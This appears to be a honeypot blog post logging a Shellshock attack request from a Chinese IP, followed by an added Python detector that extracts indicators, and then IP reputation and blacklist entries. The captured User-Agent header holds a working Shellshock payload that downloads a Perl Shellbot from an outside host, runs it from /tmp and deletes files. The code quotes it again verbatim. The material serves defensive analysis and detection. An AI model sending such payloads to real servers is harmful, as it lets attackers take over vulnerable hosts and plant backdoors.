Saturday, 24 October 2015

221.3.153.172 - Backdoor Perl Shellbot via http://xn--80ahdkbnppbheq0fsb7br0a.xn--j1amh

BEGIN OF HTTP DATA:
2015-10-23 06:47:24
Source IP: 221.3.153.172
Country: CN RiskScore: 1 Malware: []
GET HTTP/1.1 HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: () { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system("wget http://xn--80ahdkbnppbheq0fsb7br0a.xn--j1amh/vira.txt -O /tmp/vira.txt;curl -O /tmp/vira.txt http://xn--80ahdkbnppbheq0fsb7br0a.xn--j1amh/vira.txt;perl /tmp/vira.txt ; rm -rf vira.*");'
Host: 109.234.106.8
Connection: Close
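
The request above is a Shellshock (CVE-2014-6271) probe: the User-Agent value starts with a bash function definition (`() { :;};`) and everything after it is the command a vulnerable bash-backed CGI handler would execute. The Python below is an added example and not part of the original post or the honeypot that produced the capture. It shows how to spot that pattern in a captured request and pull out the indicators a defender wants: the injected payload, the download URL, the IDN hostname decoded from punycode, and the dropped-file paths. The captured request is copied from the log above; the benign request, the function names and the regular expressions are constructed for this example.

```python
"""Detect Shellshock-style probes in captured HTTP requests and extract
indicators (payload, download URLs, IDN hostnames, dropped-file paths).
Added example; constructed helpers, not code from the original post."""
import re
from dataclasses import dataclass, field
from typing import Optional

# Bash function-definition prefix that triggers CVE-2014-6271 ("Shellshock").
# The classic probe is "() { :;};", but any "() { ... };" inside a header
# value is suspicious: no legitimate HTTP client sends one.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{[^}]*\}\s*;?")
URL_RE = re.compile(r"https?://[^\s'\";)]+")
TMP_PATH_RE = re.compile(r"/tmp/[\w.\-]+")


@dataclass
class Finding:
    request_line: str
    header: str                                 # header carrying the prefix
    payload: str                                # text after "() { ... };"
    urls: list = field(default_factory=list)    # download URLs, as sent
    hosts: list = field(default_factory=list)   # (as-sent, IDN-decoded) pairs
    paths: list = field(default_factory=list)   # /tmp/... drop locations


def parse_request(raw: str):
    """Split a raw HTTP request into (request_line, {lowercased name: value}).
    Only the first ':' separates name from value, so colons in the value
    (URLs, perl code) are preserved."""
    lines = raw.strip("\r\n").splitlines()
    headers = {}
    for line in lines[1:]:
        if not line.strip():
            break                               # end of header block
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0].strip(), headers


def decode_idn(host: str) -> str:
    """Decode punycode labels (xn--...) one at a time, so a label that fails
    to decode or round-trip is kept as sent instead of hiding the rest."""
    out = []
    for label in host.split("."):
        try:
            out.append(label.encode("ascii").decode("idna"))
        except ValueError:                      # UnicodeError is a ValueError
            out.append(label)
    return ".".join(out)


def unique(items):
    """Order-preserving de-duplication."""
    seen, out = set(), []
    for x in items:
        if x not in seen:
            seen.add(x)
            out.append(x)
    return out


def scan_request(raw: str) -> Optional[Finding]:
    """Return a Finding for the first header carrying a Shellshock prefix,
    or None when the request looks normal."""
    request_line, headers = parse_request(raw)
    for name, value in headers.items():
        m = SHELLSHOCK_RE.search(value)
        if not m:
            continue
        urls = unique(URL_RE.findall(value))
        hosts = [(h, decode_idn(h)) for h in unique(u.split("/")[2] for u in urls)]
        return Finding(request_line, name, value[m.end():].strip(),
                       urls, hosts, unique(TMP_PATH_RE.findall(value)))
    return None


# Request copied verbatim from the honeypot capture in this post.
CAPTURED = r"""GET HTTP/1.1 HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: () { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system("wget http://xn--80ahdkbnppbheq0fsb7br0a.xn--j1amh/vira.txt -O /tmp/vira.txt;curl -O /tmp/vira.txt http://xn--80ahdkbnppbheq0fsb7br0a.xn--j1amh/vira.txt;perl /tmp/vira.txt ; rm -rf vira.*");'
Host: 109.234.106.8
Connection: Close
"""

# Constructed benign request, to show the detector stays quiet on normal traffic.
BENIGN = """GET /index.html HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64) Firefox/41.0
Accept: */*
"""

if __name__ == "__main__":
    for raw in (CAPTURED, BENIGN):
        finding = scan_request(raw)
        print("no Shellshock pattern" if finding is None else finding)
```

Two details in the extracted payload are worth a defender's attention. The `curl -O /tmp/vira.txt http://...` form is malformed (`-O` takes no argument, so `/tmp/vira.txt` is treated as a URL), which means the `wget` line is the one that actually fetches the dropper. And `rm -rf vira.*` runs in the working directory of the CGI process, not in `/tmp`, so on a host that executed this the file may still be sitting at `/tmp/vira.txt`.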

221.3.153[.]172

    Static Source: GeoIP data
  • Country: China
  • ASN: AS4837 CNCGROUP China169 Backbone
    Dynamic Source: SANS Internet Storm Center
  • comment: IP is listed on SANS ISC
  • comment: This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/221.3.153.172
    Static Source: panwdbl.appspot.com
  • Comment: Listed in open blacklist
  • Reference: https://panwdbl.appspot.com/lists/openbl.txt
    Static Source: http://sendmespamids.blogspot.nl/ Blacklist
  • Comment: Listed on Honeypot blacklist
  • Reference: https://raw.githubusercontent.com/johestephan/smsids-blacklist/master/blacklist.txt

Feed search for 221.3.153[.]172

    Source: Local Feed Database
  • Title: 221.3.153.172 - perl trojan via shellshock - cc 69.89.2.153
  • Reference: http://sendmespamids.blogspot.com/2015/10/2213153172-perl-trojan-via-shellshock.html
  • In db since: 2015-10-21 13:01:19.504158